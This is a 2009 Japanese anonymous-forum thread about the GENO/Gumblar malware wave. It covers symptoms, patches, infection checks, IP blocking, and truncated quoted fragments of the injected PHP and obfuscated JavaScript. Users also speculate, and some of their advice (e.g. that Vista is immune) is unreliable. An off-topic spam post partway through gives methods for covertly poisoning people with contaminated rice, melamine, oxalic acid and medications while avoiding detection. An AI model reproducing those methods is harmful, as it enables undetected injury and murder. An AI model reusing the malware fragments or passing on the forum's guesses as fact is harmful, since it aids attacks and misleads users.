ウイルスのこと何も分からない俺に教えてください・・・
GENOに感染して総再インスコしたんだけど 先にマカフィー入れてからアドビリーダーの最新版を入れようとしたら バッファーのオーバーフローがどうのセキュリティ面に重大な問題がどうのと警告が出てインストール出来なかった 昨日発表されたパッチがあれば問題なくインストールできるのだろうか…
>>315  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
|
____.____ | .__
| | | | |\_\
| | ∧_∧ | | | |.◎.|
| |( ´∀`)つ ミ | | |.: |
| |/ ⊃ ノ | | .\|.≡.|
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |
>>315 ホムペ持ってないなら気にする必要なし。
adobe readerは8と9どっちがいいの?
>>316 こっちは、インストできたよ
こんなに大変な事態だとIPブロックをしないといけないなー
XPのファイアーウォールってIPブロックの機能ないんだろうか?
sqlsodbc.chmがないんですが、これは異常なんですか? OSはVistaです
>>321 Vistaの場合はsqlsodbc.chmは
C:\Windows\Help\mui\0409
C:\Windows\Help\mui\0411
のどちらかにあると思うよ〜
>>319 迷う理由がわからないけど特に8を使う理由がなければ
9で良いと思うよ
>>325 いや、特に8を使う理由はないんだけど、9は不具合が多いって
聞いたもんでw
ありがと
9は開いた文書の数だけウィンドウが開いて、 タスクバーにボタンが作られるのが気に入らない
>申し訳ありません。更新に使っていたPCが、 >通称zlkon・GENOウイルスと呼ばれているウイルスの亜種に感染していたようです。 >以下の時間帯に各ページにアクセスした方は感染の恐れが有ります。 > >5月12日 午前6時31分〜午前8:00頃 >・ニコニコのぞき見検索のトップページ・ランキングページ・再生ページ以外のHTMLページ >・SayMove!のトップページ >同日 午前6時31分〜正午頃 >・ニコニコのぞき見検索のマイリスト表示ページ の件だけど、Vid-DLとかを経由で動画落しても、感染するの?
94.247.2.195(94.247.[2-3].[0-255])への接続を遮断 ってどうやるか判る人居ます?是非ご教授してほしいです
教示
>>332 間違えました><
94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
ってどうやるか判る人居ます?是非ご教示してほしいです
まず服を脱ぎます
>>303 不正なジャバスクリプトを仕込まれたページを閲覧する
ジャバスクリプト起動
アクロバットリーダー、もしくはフラッシュを起動
アクロバットのジャバスクリプト機能を起動
そこから侵入
>>331 ルーターかPG2(ソフト)でブロックしろ。
PG2でのブロックの仕方はリネージュ資料室辺りでも漁ってくれ。説明は面倒だ。
Vistaの場合は、PG2(英文のβ)入れただけじゃ駄目で、ローダー経由で起動しないと
実際の動作しないことにも注意。
うちは日本語化したPG2を常駐させてるなぁ 結構、役に立ってる
>>336 よくわかんないけど・・・情報ありがとう!調べてみる
もしこれ感染したの知らないままホームページ更新してたら ソースにはなんて記述されてるの?
>>339 参考
<?php
if(!function_exists('tmp_lkojfghx')){
if(isset($_POST['tmp_lkojfghx3']))
以下略
*.jsすべての後ろに、
<!-- document.write(unescape('0F%3COjAsJvcriOjApJvtJv
今回のもラトビアとばされんのか?
>>340 ありがとう
とりあえずトレンドマイクロ オンラインスキャン検出無し
sqlsodbc.chmハッシュ値確認正常
ホームページのソースに怪しい記述なし
pc再起動正常、cmdやregedit正常に起動
安心していいよな…
GENOウイルスって感染するとDドライブとかにも影響出るんでしょうか? 再インストしてカスペルスキーのオンラインスキャンかけたらもう検出はされなかったんですが 申し訳ないのですがどなたか教えていただけないでしょうか
>>343 データのバックアップができるぐらいだから
影響なかったはず
>>344 レス本当にありがとうございます。安心しました
一回再インストールかけたらフォルダの合計は普通なのにHDのプロパティで調べたら
100G以上あったりしてすごく焦りました…
もう一度かけたら直ったのですがウイルス系にかかったのは初めてだったんで
色々と過敏になってしまってました
>>345 ウィルスのほうをバックアップしてなかったら、大丈夫
Macは感染しないよね?
Windows7は感染しないよね?
Vistaなら感染しない
350 :
345 :2009/05/13(水) 23:37:32
>>346 あれ…不安になってきました
Dドライブを見て隠し含めてフォルダが無くカスペルスキーで
オンラインチェックして問題なかった場合はまず大丈夫と見て良い…でしょうか?
そろそろちゃんと報道されるかな?
628 シンフィアンドラ・ザンゼグラ(東日本) sage 2009/05/13(水) 23:48:57.86 ID:wuS3Hwtd(3)
小林製薬もGenoウィルスにやられてたのか。
シャレにならん事態だな。
http://www.kobayashi.co.jp/info/090512.html クリーンインストールしない限り修復不能で、botnetに組み込まれてしまう
ような厄介な代物なのに、いつまで経ってもまともに報道されないのは
初期感染サイトが隠蔽したってのが大きいんだろうか。
国内の正規サイト改ざん:攻撃サイトを変え再襲来
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884 国内のWebサイトが次々に改ざんされ、閲覧者にウイルスを感染させようとする
悪質なJavaScriptが埋め込まれる問題が続いている。
ラトビアに設置された攻撃サイトが4月末に閉鎖され、ひと安心と思ったのも束の
間、今度は「gumblar.cn」というドメインにサイトを移して、攻撃を再開
したようだ。中国のドメイン名だが、サイトはロシアでホストされている。
■BIG-server.com
ゼロ(札幌市厚別区)が運営するレンタルサーバーのBIG-server.com(中略)
■ウェルネス
医療情報の提供やマーケッティングを行っているウェルネス(東京都文京区)(中略)
■ホースマンクラブ
インターネットポイントサービスを行っている、へそクリック(横浜市西区)は7日、
ホームページ上に掲載していた広告主で競馬情報の提供を行っているホースマンクラ
ブのサイトが改ざんされ、不正なスクリプトが埋め込まれていたと発表。広告の掲載
を中止(中略)
攻撃サイトが変わり、最初にロードされるJavaScriptファイルまでが頻繁に更新
されている。ウイルス対策ソフトの対応が間に合わないようで、更新直後の検出率
は極めて低いという状態だ。(中略)
ここいらで一旦、一般人がやっておくべき対策をまとめようか
ロシアにいってサーバーを破壊すればいいんでは?
どんな症状がでるの?感染すると?
ロシアンマフィアの構成員になれて逮捕される
全身がもの凄くカユくなる
肩こりがなおる
タミフルで治るって舛添が言ってた。
360 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 01:55:38
∧∧ ヽ(・ω・)/ ズコー \(.\ ノ 、ハ,,、  ̄  ̄
やっぱり有名どころが感染しないとダメなんだな 色んな意味で
どうやってサイトを改ざんしているかってのに興味ない奴多すぎるし書いても無視されるし いいよ無視しろよ難しいことからは目をそむけて生きろよ、おまえらは 理解できる奴だけ理解してればいいよ、もう ftpはパスワードが暗号化されてない snifferで盗撮すれば簡単に他人のパスワードを盗める botnet、又は複数のノードを持ってたり複数のプロバイダと契約してたり いろんな経路でsnifferできる環境にある奴、又は組織なら いろんなサイトを改ざんできる さらにいろんな人のメールを盗み見ることも出来る どのサイトを見たのかという情報も簡単に手に入る ネットが匿名なんていってる奴は情弱 全裸で外を歩いているようなものだよ
avast先生が俺のPCを御助けくださった・・・ もう感謝するしかねえ
AVAST今回は頑張った
豚インフル並にたいした事なかったなw
367 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 08:48:46
>>351 大手企業だから詳細な説明してくれるといいんだが。
Adobe Readerをアンインストールしたよ。 代わりはPDF-XCHANGE VIEWER。
369 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 09:15:52
GENOウイルス
unescapeが含まれてたら警告出すとか、そういうのできないの?大体unescape含んでるんでしょ?
直リンしちゃだめでしょ
373 :
372 :2009/05/14(木) 10:53:45
ごめんしてなかったか申し訳ない
374 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 11:02:10
ウゼエな
間違ってクリックしちゃうから工夫して書いて・・・
379 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 11:07:20
381 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 11:10:19
Genoって難読化の方法もいくつかパターンがあるんだな。
383 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 11:12:59
384 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 11:14:33
>>384 その通り。gumblar.cnからウィルス本体を送り込まれる。
386 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 11:18:48
>>385 なるほど・・・
それで、avastで検出されたウイルス名が「Redirector」だったわけか・・・
つまり、「再接続させる」って意味でしょうね
↑ ごめんそのまま貼っちゃった リンク踏まないよう注意してください
なにやってんだかwww
390 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 11:24:21
>>388 ちょw
自分で言っておいてw
何をやっているw
専ブラだとttpでもリンクになる場合が多いから危険すぎるな
392 :
388 :2009/05/14(木) 11:27:41
申し訳ない orz
393 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 11:30:23
ht tp://www.google.com/ こういう風に張ればいいんだよ
http部分いじったって、GreaseMonkeyスクリプトや専ブラで直リンになるしどうだっていいよ
>394 専ブラだとこれでも飛べちゃうんだよな
他のブラウザは知らんがIEならアドレスバーにコピペすれば 自動的にHTTPの文字が追加されるので wwwから書けば良い
途中の「test」を「てすと」に代えるとかしないと駄目だね
hxxpでいいんじゃない?
b2rだけど、こういうのってカーソルもってっただけでもヤバイ?
www.example.com ←これをリンクにする専ブラもあるそうだ ドットを●や■に変えるのをお勧め
384のはこのスレに貼られる前からあちこちのスレに貼られてるな
↑気づいたのは今だよ
vista使いは丸腰でブラブラしてても良いのかね
>>406 よう俺
最近この話題知ったんだ
一応チェックはしておきたい
逆にこれはホームページを持ってるとわかりやすいってこと? htmlアップロードすりゃ感染してるかどうかわかるよな?
409 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 12:42:05
ラトビア特急、ゆっくりと路線縮小中 2009/04/09(木) 7560 個 2009/04/17(金) 8567 個 2009/04/19(日) 11795 個 2009/04/27(月) 15096 個 2009/04/30(木) 13456 個 2009/05/14(木) 12314 個のドメインを感染させています。 中々収束しないな orz
違う。 clientとserverの違いを考えろ。 お前はclientだろうが
>>386 > つまり、「再接続させる」って意味でしょうね
> つまり、「再接続させる」って意味でしょうね
> つまり、「再接続させる」って意味でしょうね
「俺スルドイこと言った」とか思ってる?
414 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 13:34:38
415 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 13:41:38
汚染米とラジコン
http://gimpo.2ch.net/test/read.cgi/radiocontrol/1212811357/337- http://gimpo.2ch.net/test/read.cgi/bouhan/1239734019/20- カビ毒米って便利いいよね。
普通に食べて肝臓癌にして殺すことできるもんね。
気づかれずに何度も侵入、そのたびに米びつのお米をカビ毒米と交換、
後マヨネーズや醤油、ソース、ケチャップ、みりんなどなど毎日少しずつ使うものに弱毒性の毒物を入れておく。
ターゲットは一年以内にアポーン。
気づかれそうになったら若年性統合失調症とか何とかいえば誤魔化せます。
http://www.tk-telefilm.co.jp/gaslight.html 夜になると不思議と暗くなる部屋のガス灯…それに気づくのは私だけ…。
精神的に追詰められる心理サスペンスの傑作!
昔々から精神病ってエロエロと利用し甲斐があるようで、、、、
ガスライティング----で検索 ガス燈の映画の影響か欧州ではよく知られた方法
メラミンやシュウ酸の粉末を砂糖や塩、牛乳に混入。確実に結石(総胆管結石、尿管結石)になる。
あかちゃんなら異物混入が疑われるが40代50代なら本人の病気ですんでしまう。
あと降圧剤や昇圧剤、利尿剤などなどいろいろあるみたいだね。
これらは砒素のように明らかな毒物でもないから発見されても犯罪の立証がむずい。
薬物毒物と鍵屋の組み合わせは非常に厄介だ。
プロの鍵屋にかかれば開かない鍵はないといわれている。
皆さま、家族全員が留守にする時はお気をつけあそばせ。
あと、尿酸とある種の(現在不明)ある種の薬物を加えると膝痛や腰痛を起こすことが出来るようだ。
重いものを持っていないのに急に腰が痛くなったなどというとき、
ひょっとすると、ひょっとするかもしれませんよ。
旅先での見も知らない人からのドリンクサービスや席を外したあとの飲み物なども危険がいっぱいですよ。
泊りがけの飛行会の後体調異変はありませんか。
---------------------------------------------
みんな気をつけようね。
どんな一流の鍵屋でも無傷で開けられない鍵作らないと、、
現状では一流の鍵屋ならどんな鍵も開けてしまう。
暴力団が借金漬けの鍵屋を支配下に置いたらやりたい放題だよ。
感染の確認方法は?
gumblar.cnへの接続を遮断してもダメ?
まだ感染してない人はバックアップ取っとけよ、新規インスコは設定がめんどい もちろんほとんどの人は設定済みリカバリ用意してるだろうけど
gumblar.cnにaguseで行ったらadblockのgumblar.cnカウントが5になってんだけど これ大丈夫だよね? もしabblockでgumblar.cnをブロックしてないと、abuseでgumblar.cn見ても駄目なんじゃ?
421 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 13:57:51
〉〉419 感染の真偽はまだわからないが、 リカバリーディスク作ってなかった僕はどうすればいいでしょうか?
プリインストールじゃなければいいけど
>>420 まじだな
aguseで怪しいサイト踏みまくったんだが・・・・
おれもgumblar.cnがカウントされてた
425 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 14:17:54
〉〉423 プリインストールでした本当に(ry 詰んだか?OSはVISTAだけども、、、 後処置法何かある?
すまん、Adobe Acrobatとreaderってどう違う? プログラムの削除画面で、Acrobatがなくてreaderしかないんだが、readerだけアップデートしとけば良いってことなんだろうか?
>>426 Acrobatは有償の製品版。PDF作成機能がある。
誰か
>>304 にも答えてほしいです。
vistaだしjavaスクリプトも切ってるから一応このままアップデートしなくても大丈夫かな・・・?
>>425 VistaでGenoに感染したのなら、初の例じゃないか?
JavascriptはVer.6以上のWindowsをはねてるし。
read:読む[er] readerが9.1.0ならreader開いてヘルプのとこから9.1.1にアップデートできる あと設定からAdobereaderJavaScriptも切っとけ
>>430 そっか。XPでもUAを偽装しておけばGenoを防げるなw
>>420 怖いからVMwareでやってみた
俺もgumbarがカウントされてることを確認した・・・・
>>430 いやまだカスペチェックしてないからワカラン
しかしIEがよく落ちたりするからさ
感染の確認方法おしえろやクズ
>>437 クズに教えを請うなんて恥ずべきことだぞ
再起動して戻ってこれたら感染してない
千葉女どこいっちゃったの 寂しいから出てこいよ
441 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 14:44:37
???
442 :
429 :2009/05/14(木) 14:44:38
もしかしたら自分の質問は初心者すぎるからスルーされているのかな、と思うので セキュリティ初心者質問スレに移動してよかですか? マルチになる?
該当バージョンのアップデートを
>>292 でDLできないか
>>420 >adblockのgumblar.cnカウントが5になってんだけど
これってフィルタに「gumblar.cn」って入れてるってこと?
>>443 すんません、できました。
騒いで申し訳ないです。
有難うございます。
>>420 「gumblar.cn」をフィルタリングしてるなら
aguseで編集したアドレスにgumblar.cnという文字列が含まれるからだと思われ
gumblar.cnのIP「94.229.65.160 - 94.229.65.191」がブロックはアクセスしてないし
ブロックもカウントされなかったから、そういうこと
448 :
445 :2009/05/14(木) 15:13:52
すみません、もうちょっとだけ質問。
>>297 はあまり気にしなくてもOK?
確かにプロパティみると9.1のままだけど。
Adobe Readerを使う時だけインストして使い終わったらアンインストすればいいんじゃないか すげええ面倒だけど
>>446 何だaguseのアドレスに反応しただけか!
あー安心したありがとう
>>448 Adobe Reader 9.1.1 Update - Multiple Languagesはやった?
>>447 安心したついでに質問だけどいいかな
adblockのフィルタリングはこんな感じでいいのかな
*/94.229.[64-65].[0-255]/*
*/94.247.[2-3].[0-255]/*
なにそれこわい
JavaScriptの正規表現だからそれでOK /*とか無くてもいい
Adobe Readerを使う時だけインストして使い終わったらアンインストすればいいんじゃないか すげええ面倒だけど
aguseの件はマジびびった。 ミイラ取りが。。になったかとおもたよ
>>454 これってoperaの場合どうやればいいの?
adblockにIPアドレスベースのアクセスフィルタ機能はないでしょ
425だが、 OSvistaでGENO大丈夫かと思うが心配だから カスペ使おうと思ったがセキュリティソフトがマカフィで機能の一時停止ができない、、 他にできる確認方法ある? WINDOWSのsqlsodbc.chmのチェックくらい? 探してもないんだが、、
踏んでみれば分かる
カスペのオンラインスキャンの事を言ってるなら ニフティのが同一らしいのでそっち使うといい
>>448 ヘルプ>アクロバットリーダー9について の所で
バージョン9.11になっていなければパッチ適用されてない
>>413 >小林製薬によれば、ユーザーが感染した恐れがあるのはダウンローダー型のトロイの木馬。主な動作としては、
>改ざんされたページにアクセスした場合、別のページからウイルスやスパイウェアをダウンロードするという。
>また、感染した場合には、「sqlsodbc.chm(C:\WINDOWS\system32\sqlsodbc.chm)が改変されるほか、
>コマンドプロンプトとレジストリエディタが起動不能になることが確認されている
ああ、間違いないGENOだ。
>>436 カスペのサポセンに聞いたらチェックする時に設定を推奨レベルではなく高にして
何度かやってみてくれと言われた。それで感染の有無が分かるはずだってさ
>>471 オンラインスキャンでも同じ?
てかわざわざサンクス
>>464 ニフティのがカスペエンジンだったはず。
そっち使ってみては?
474 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 16:03:10
>>413 小林製薬はこのウイルスに面白いネーミングをつけてくれるはず
>>452 はい。
>>292 さんの所からやりました。
更新日時も今日の15時ぐらいになってます。
でも9.1(9.10のことですよね)のままです。
どんなソフトも大体そのへんにバージョン表示されるからw
感染してた! sqlsodbc.chm見事に改変されてるううう クリーンインストールしてくる…
WinXPつかっててGDATAがアクセス拒否した。
ウェブサイトがブロックされました。
G DATA InternetSecurity 2009 がこのウェブサイトへのアクセスを拒否しました。
このサイトは感染しています。感染コード: JS:Redirector-H2 [Trj] (エンジン B)
保存してソース見たかったけどそれも出来なかった(拒否される)からエミュのWindows98でアクセスしないように保存して、ソース見た。
ttp://ghard.run.buttobi.net/1.jpg …これ? エミュでもアクセスして感染するとハードディスクファイルを戻すのが面倒だからね、、、
Javascriptはいつも切ってるけどこれなら感染しないのかな。
めっさ伸びとる
>>470 ファイル実行regeditで
起動すればセーフって事?
ガチでパニックが起きそうだな
インフルよりアレかもね。
あっちはいまのところ他人事だけど、こっちは目の前の火事だからな
ワクチンないもんね。 フルインスコでなおるつっても邪魔くさいし。
薬事日報→小林製薬という流れか?
笑い男事件
>>480 そうなんですね。
全然知らなかった。
一つ賢くなったよ、有難う。
>>481 はい。
それやりました。
URLが紫になってます。
「URLが紫になってます。」だって。
初心者すぎて自分で泣けてくる。
>>374 -
乙です
一応、電凸して対応する様伝えました
499 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 17:42:41
早く普通に駆除できるようにならんのかな
>>499 ビスタにsqlsodbc.chmはないから違うと思う
>>498 横柄の極み
同じ事を何度も言わせるわ、待たせるわ
PHSで東京から大阪まで電話代が幾ら掛かるか配慮もせんと
一回氏ね、みたいなw
503 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 18:00:45
>>501 dクス。
ビスタまで殺られたと思ってUNKOもらすとこだった!
504 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 18:06:24
374=384です avastで、全ドライブをチェックかけましたが、ウイルスは検出されませんでした これは、最初のアラート音が鳴った時に、ページを開く前にウイルスのコードをavastが発見して 実行するのを未然防止したと考えて良いんでしょうか? それとも、もはやavastでも検出できないような姿に変化して、ブート領域にウイルスが住み着いているんでしょうか? 何か、ウイルスに感染しているかどうか確かめる方法(どっかのディレクトリの特定ファイルが削除されているとか、 改変されているとか、新しく特定名称のフォルダ、ファイルが作られているとか・・・)ってありませんか? とりあえず、avastで全ドライブをチェックかけて、何も出て来なければ、感染を未然に防止できたと考えてOKでしょうか?
505 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 18:07:06
たった今、うっかりGENOのホームページに行ってしまったんだがまだヤバいの? 詳しいこと知らないので、心臓バクバクいってます。
>>471 だけどカスペ先生の更新時期がもう直ぐavastは
無料なのにGENOウイルス検知するほど性能がいいのか・・
更新しないでavast使ってみようかなぁ
スレチでスマン
今回はたまたまavastが頑張ったという気もするけど うちはavast+定期的に他社オンラインスキャンで今までウィルスに引っかかった事は無いかな
うちのルーターはIP焼き設定数上限に達しやがったぜ・・・
>>481 なぜか実際のサイズが
2,150,400 バイト
>>374 >>497 今そこはサイトメンテナンスしているようだ
ユーザー名とパスワードを要求してくるな
IPブロックって、 peergurdianなんかでやるんですか?
513 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 18:51:52
GENOウイルスってトロイの木馬らしいですが、具体的にどういう悪さをするんですか?
スレ嫁
515 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 19:05:04
スレをざっと見渡した感じでは、良く挙動が分かっていないってことですかね?
>>515 そう書けば、誰かが教えてくれると思った?
面倒な人だね
書き込み
>>425 だが、チェックしてきたお
【OS】Vista
【セキュリティソフト】マカフィ
【ウィルスを疑った理由】saymoveの利用・IEのフリーズ
【確認手段】
1:PCの再起動が正常か否か
2:sqlsodbc.chm の改変の有無
3:ニフティでのオンラインチェック
【結果】
1:正常に起動○
2:改変は無し○
3:管理者モードでIE起動方法わからず・・・orz△
3がチェックできれば完璧なんだが・・・
WHOのパンデミック警報はフェーズ5だけど、 このウイルスはフェーズ幾つぐらいよ?
519 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 19:43:54
>>516 いや、思いませんでしたよ
2chは不親切な人が多いですから
>>518 もうフェーズ6レベルじゃね?
収まる気配ゼロだし
522 :
521 :2009/05/14(木) 20:05:52
あ、すまん、ニフやってきたのね
・sqlsodbc.chmを改変 ・cmd.exe、regedit.exeが起動不能 ・一部のアンチウイルスソフトが更新不能 ・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト) ・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集 ・Googleの検索結果を改竄(リンクを弄る) ・explorer.exeや一部のブラウザが異常終了 ・Acrobatが勝手に起動 ・PDFファイルやシステムファイルが増殖 ・CPU、メモリ使用率がUP ・再起動時にBSOD
>>522 一応事故解決してニフでチェックでできたお
【OS】Vista
【セキュリティソフト】マカフィ
【ウィルスを疑った理由】saymoveの利用・IEのフリーズ
【確認手段】
1:PCの再起動が正常か否か
2:sqlsodbc.chm の改変の有無
3:ニフティでのオンラインチェック
【結果】
1:正常に起動○
2:改変は無し○
3:ウィルスはなし○
ということで一応大丈夫みたい
ただちにウィルス更新とバックパックしてきま
>>484 unescape〜replaceの右上にgumblarが出てるな。
>>523 Googleの検索結果を改竄って初めて見るが、何処の情報?
XP厨はいつ何時やられるかわからず冷や冷やもんだな
>>523 なぶり殺しと言うか、何と言うか…。
いっそ、HDDを綺麗さっぱりフォーマットしてくれた方が…。
google検索改竄して自サイトへアクセスさせようとするのかな
終息してるし次スレは要らないね。
>>531 アフィリエイト狙いらしい。
そこから足が付きそうだけど、匿名口座とかも使ってるんだろう。
このウイルス、VISTAはスルーなんだって? 俺、XPなんだけど cmd.exe、regedit.exeが起動したってことは 感染してないってことおkなんだよね?
>>536 念のために
【確認手段】
1:PCの再起動が正常か否か
2:sqlsodbc.chm の改変の有無
3:ニフティでのオンラインチェック
ぐらいはしておいたほうが・・・
VISTA感染報告きてるね
まだ未確定の段階か
・Googleの検索結果を改竄(リンクを弄る) ↑これどうやって確認すればいいの?
>>543 まだ詳しいことかいてないからわからないけど、一応貼っとくね
***
あの有名動画サイトSayMove!がGenoウイルスに感染、アクセスした乞食どもやばいぞ
http://tsushima.2ch.net/test/read.cgi/news/1242145955/864 864 名前: キクザキイチゲ(中国地方)[sage] 投稿日:2009/05/14(木) 20:24:48.23 ID:0ZvJo5LH
該当時間のsaymoveにアクセスした後、パソコンの挙動がえらい不安定に
なったんだけど、やっぱりこれって喰らってしまったんでしょうか?。
ビスタHomePremium64bit+avast!なんですけど、
頻繁にフリーズするようになった(PCを購入して約2年一度も無かったのに、
一昨日から今日までに7回もフリーズ。)
あと、ついさっき、
スリープにしてても勝手に復帰している
スリープから復帰して暫くすると、HDDを認識しないようになる
といった症状がでた。
一応、カスペルスキーのオンラインスキャンの重要な部分だけを試して
みたけど、検出はされませんでした。トレンドマイクロの方も同様。
報告されている症状と全く違うんですが、どうなんでしょ?。
>>546 アフィのスクリプトをひとつずつページソースで確認するしかないでしょ。
>>548 面倒だなw
firefoxなんだけどWOT(Web of Trust)とか入れてもだめなのかな?
ちなみにWOTって「分かりやすく色分けされたWOTアイコンによって
サイトへのリンクをクリックする前に、オンライン詐欺、なりすまし
不審なショッピングサイト、セキュリティの脅威などを回避できます」
というアドオンですが、自分は入れてません
avastさんが感知してくれたのに誤作動だと思って突っ込んで感染した俺だけど やっぱりIEがよく反応無しになる、おまけにパソゲーも反応無しになる 今カスペルスキーってとこでオンラインスキャンしてるが このウイルスはどこに感染するんだ?32のチェックはもう終わったみたいだが 何も検出されなかったぞ? 全領域でやったら一件検出されたが何か勝手に止まったわ
ググれば一番上にくるからすぐ分かると思うけど「ライブハウス あさがやドラム」の サイトも怪しいらしいのですが、誰かvistaの人確認してくれないかなw
>>550 感染が確実なら時間勿体無いから即リカバリしたほうがいいよ。
疑心暗鬼で使い続けるのは精神的に辛いでしょ
>>550 新種が毎日出ててカスペも新種は当然スルー
>>552 代えのHDDがねえんだよっ!仕事ねえからさ・・・
Aviraは感知してくれる?
誤作動はないし、
>>539 でチェックしても問題ないから、
いまんところ被害はないと思うけど、
怖いものみたさで問題サイト踏んでみたいという妙な欲望も・・・
>>556 おおっ!!
ありがとう勇者様、一昨日は大丈夫だったらしいんだが・・・
なんか被害拡散してるなw
何れにしても中古の使い捨てPCでよかったよ。
これってプログラムが書き換えられるだけみたいだし システムの復元とか使えないんだろか?
>>559 フルバックアップでもなければ無理だろ。
>>559 >システムの復元
それのほうが怖いよw
スレの伸び方が恐ろしい。 急に拡散した?
>>559 そんな無意味な事するくらいならインストールしなおすわ。
>>562 前から拡散、大手・個人の各サイトが隠蔽・感染に気づかず
新型インフルを超えた・・・。しかし、山田みたいに話題にも
あがらない・・・
>>549 中の人やユーザの評価で安全か有害か決めるんならあまり頼れないんじゃない?
小林製薬が感染したことで、PCライトユーザーにも十分認知されればいいんだけど。。
潜在感染者が多そうだな。
>>573 俺XPなんで、対策してても怖くて踏めませんw
ところで
>>129 が繋がんないんだけど、俺だけ?
ウイルスセキュリティZEROのサイトのサービスが止まってるってよ。
VMware導入した。ウイルスの挙動を確かめたいんで、感染済みのサイト教えてくれ。 あとAcrobat Reader9.1でも感染するっけ?
感染してすぐ症状出るものですか?
579 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 22:20:33
フラッシュとアドビ9.1入れてasagaya-drum.com 踏んだけど 特になにもおきない
580 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 22:21:25
(\.n 安全安心とっても快適な工夫もいっぱい windowsVISTA みんな買おうよ! ヽ .ソ | | ∧_∧ | | ∧_∧ _( ´∀`) ∧_∧ ∧_∧ ∧_∧ ∧_∧ ∧_∧ \ \( ´∀` ) ̄ ⌒ヽ ( ´∀` ) ( ´∀` ) _ (´∀` )⌒`(´∀` )--―(´∀` ) n \ ⌒ ̄ヽ ./~⌒ ⌒/⌒ ⌒ヽ /~⌒ ⌒\ \ ( E) ∩. `、 ./ ̄| //`i / /| //`i / | ヽ ヽ/ / . (7ヌ)| | (ミ ミ) | ∧__∧ | /(ミ ミ) |∧_∧| | | \__/ / / ∧_∧ ∧_∧ _( ´∀`) ∧_∧ ∧_∧_(´∀` ) ∧_∧ || \ \( ´∀`)―--( ´∀` ) ̄ ⌒ヽ ( ´∀` ) ( ´∀` ) _ ⌒ヽ(´∀` ) // (\.n\ /⌒ ⌒ ̄ヽ /~⌒ ⌒/⌒ ⌒ヽ /~⌒ ⌒ / ヽ .ソ | |ー、 / ̄| //`i / 、 /| //` i / | | | | |∧_∧ / (ミ ミ) | | | /(ミ ミ) .| | | | ∧_∧ _( ´∀`) ∧_∧ | ∧_∧___∧_∧ .|∧_∧ \ ∧_∧.| \ \( ´∀` ) ̄ ⌒ヽ( ´∀` ) | ( ´∀` ) _ (´∀` )⌒`(´∀` )--―(´∀` ) | . . n \ ⌒ ̄ヽ . /~⌒ ⌒/⌒ ⌒ヽ /~⌒ ⌒\ \ ( E) ∩. `、 ./ ̄| //`i / 、 /| //`i / | ヽ ヽ/ / . (7ヌ)| | (ミ ミ) | ∧ ∧ | /(ミ ミ) |∧ ∧ | | | \__/
ポットウィルスなら駆除出来るけどこれは難しいのかなぁ
>>580 お前ら全員VistaにくるとVistaが狙われるようになるから来ないでくれるか?
>>567 オレも導入しようとしたが、日本語版とれないな・・・
aguseでは白だな。>あさがやドラム
質問です。 私、セキュリティソフトはソースネクストの ウィルスセキュリティZERO を使ってるのですが、 このセキュリティソフトはGENOウィルスに対応しているんでしょうか?
588 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 22:31:58
>>584 アドビ8.13にして全部踏んだけどなんともないわ
>>579 >>432 のGoogle セーフ ブラウジングの結果で挙げられている幾つかのサイトはどうか。
もうなにがなんだかwwwww
593 :
名無しさん@お腹いっぱい。 :2009/05/14(木) 22:45:36
どこ踏んでも、sqlsodbc.chmの改変確認できねえぞ
ポッドウィルス駆除じゃこれは取りきれないか?
ポッドウィルスw
600 :
PG2 :2009/05/14(木) 23:19:50
PG2導入したんですが、上記セキュリティブログの58.65.232.0 - 58.65.239.255とかの数字を PG2のリスト追加にコピペすればいいのかな?
今北産業 現状のウイルス対策ソフトじゃ対応できないってマジ?
亜種がワラワラ出てきてるwww 対応おっつかねwww
Adobe Reader 9.1.1のアップデート、Adobeの日本語サイトにぜんぜん載ってないじゃん わかりやすく載せとけよ
maidoの感染は、マァブが原因らしい
具体的に被害が出てるのはOS関連ファイル? 普通のファイルにも感染する?
ソフト会社の人にはモカやユンケル飲んで死なない程度にがんばってほしい。
対策 * WindowsUpdate * PDFリーダーを最新にする (AdobeReader や Foxit Reader) * AdobeFlashを最新にする * 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断 * Javascriptを切る * 貼られている怪しいリンクをむやみに開かない * ウイルス定義ファイルを更新する ↑これの * 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断 はfirefoxのアドオンで対応できますか?
>>567 >>583 こちらへ
PeerGuardian 33
tp://hideyoshi.2ch.net/test/read.cgi/download/1237676474/
>>607 アンチウイルスのFWに設定したほういいと思う
Javascript切ると見れなくなるサイトいっぱいあるじゃん 不便すぎる
adobe関係をアンインストールしときゃなんとかなる? WindowsUpdateは今回のGENOウィルスには関係無いだろうけど、セキュリティー 強化の為にはまあ必要なことだ。
>>608 ありがとう。スレあったのね。いってきマース
